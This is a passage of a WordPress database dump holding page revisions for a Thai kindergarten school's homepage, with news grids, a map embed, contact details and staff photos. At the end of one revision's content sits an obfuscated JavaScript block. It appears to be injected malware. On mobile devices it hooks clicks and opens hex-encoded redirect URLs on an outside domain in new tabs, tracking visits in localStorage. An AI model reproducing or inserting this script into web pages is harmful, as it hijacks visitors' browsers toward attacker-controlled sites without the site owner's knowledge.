{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:29:06','2025-07-15 07:29:06','',19,'http://watprato.ssk.in.th/?p=681',0,'revision','',0),
(682,1,'2025-07-15 14:30:45','2025-07-15 07:30:45','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" 